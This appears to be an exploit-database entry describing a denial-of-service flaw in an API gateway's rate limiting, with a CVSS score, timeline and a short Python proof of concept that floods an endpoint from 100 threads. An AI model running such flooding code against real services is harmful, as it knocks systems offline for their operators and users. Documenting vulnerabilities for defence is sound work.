Denial of Service via Resource Exhaustion

Dos

Type

5.3

CVSS Score

Views

admin

Author

Description

A denial of service vulnerability exists in the API rate limiting implementation. Attackers can bypass rate limits and cause service unavailability through resource exhaustion.

Affected Systems

API Gateway v1.0-1.8, Linux/Windows

Proof of Concept

Exploit Code

import requests
import threading

def flood_api():
    while True:
        requests.get("https://api.example.com/endpoint")

# Launch multiple threads
for i in range(100):
    threading.Thread(target=flood_api).start()

References

https://api-docs.example.com/security

Timeline

Discovered: Mar 28, 2024

Published: Apr 1, 2024

Denial of Service via Resource Exhaustion

Description

Affected Systems

Proof of Concept

Security Warning

References

Timeline

Community Rating

Quick Actions

Related Exploits